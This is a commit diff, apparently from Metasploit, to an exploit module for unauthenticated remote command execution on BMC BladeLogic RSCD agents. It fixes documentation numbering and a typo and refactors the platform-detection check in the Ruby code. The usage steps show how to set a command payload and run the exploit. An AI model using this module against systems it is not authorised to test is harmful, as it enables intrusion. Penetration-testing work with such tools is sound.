Tidied up platform detection, check method, and minor typos.

Author: NickstaDB

documentation/modules/exploit/multi/misc/bmc_server_automation_rscd_nsh_rce.md

@@ -19,8 +19,8 @@ To use this exploit you will need access to BMC BladeLogic Server Automation.
 4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`.
 5. Select the generic command target `set target 3`.
 6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`.
-6. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
-7. Run the exploit `exploit`.
+7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
+8. Run the exploit `exploit`.
 
 The result should be that the string `MSF` is returned and output.
 
@@ -63,7 +63,7 @@ This module target provides support for command staging to enable arbitrary Meta
 	[*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000
 
 ### Target 2: Unix/Linux
-This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same was as target 1.
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1.
 
 ### Target 3: Generic Cmd
 This target can be used with *cmd* payloads to execute operating system commands against the target host.

modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb

@@ -78,31 +78,30 @@ def initialize(info = {})
 
   def check
     # Send agentinfo request and check result
-    print_status('Checking for BMC with agentinfo request.')
+    vprint_status('Checking for BMC with agentinfo request.')
     res = send_agentinfo_request
-    if res && !res.empty && res.start_with?('Response: ')
-      # Check for length field in response packet
-      res_pkt = res[10..res.length]
-      if res_pkt.length > 3
-        length_field = res_pkt[0..3].unpack('N')[0]
-        if res_pkt.length - length_field == 4
-          # Response packet appears to be in the correct format
-          print_warning('Unexpected agentinto response. Enable verbose ' \
-                        'output for actual response.')
-          vprint_warning(res)
-          return Exploit::CheckCode::Unknown
-        end
-      end
 
-      # The response wasn't in the expected format, probably not BMC RSCD
-      print_error('The target does not appear to be a BMC RSCD agent.')
-      vprint_error(res)
-      return Exploit::CheckCode::Safe
-    else
-      # BMC detected, print platform and return
-      print_good('BMC RSCD agent detected, platform appears to be ' + res)
-      return Exploit::CheckCode::Detected
+    # Check for successful platform detection
+    if res[0] == 1
+      vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
+      return CheckCode::Detected
+    end
+
+    # Get first four bytes of the packet which should hold the content length
+    res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0
+
+    # Return unknown if the packet format appears correct (length field check)
+    if res[1] && res[1].length - 4 == res_len
+      vprint_warning('Target appears to be BMC, however an unexpected ' \
+                     'agentinfo response was returned.')
+      vprint_warning('Response: ' + res[1])
+      return CheckCode::Unknown
     end
+
+    # Invalid response, probably not a BMC RSCD target
+    vprint_error('The target does not appear to be a BMC RSCD agent.')
+    vprint_error('Response: ' + res[1]) if res[1]
+    CheckCode::Safe
   end
 
   def exploit
@@ -113,7 +112,15 @@ def exploit
       # Attempt to detect the target platform
       vprint_status('Detecting remote platform for auto target selection.')
       platform = send_agentinfo_request
-      target_name = if platform.downcase.include?('windows')
+
+      # Fail if platform detection was unsuccessful
+      if platform[0].zero?
+        fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
+                  'detecting target platform.')
+      end
+
+      # Set target based on returned platform
+      target_name = if platform[1].downcase.include?('windows')
                       'Windows/VBS Stager'
                     else
                       'Unix/Linux'
@@ -159,7 +166,6 @@ def send_nexec_request(command, show_output)
 
     # Generate and send the payload
     vprint_status('Sending command to execute.')
-    vprint_status('Command: ' + command)
     sock.put(generate_cmd_pkt(command))
 
     # Finish the nexec request
@@ -208,9 +214,14 @@ def send_agentinfo_request
     res = sock.get_once
     disconnect
 
-    # Extract platform from response
-    return res.split(';')[4] if res && res.split(';').length > 6
-    'Response: ' + res
+    # Return the platform field from the response if it looks valid
+    res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
+    return [1, res.split(';')[4]] if res &&
+                                     res.split(';').length > 6 &&
+                                     res.length == (res_len + 4)
+
+    # Invalid or unexpected response format, return the complete response
+    [0, res]
   end
 
   # Connect to the target and upgrade to an encrypted connection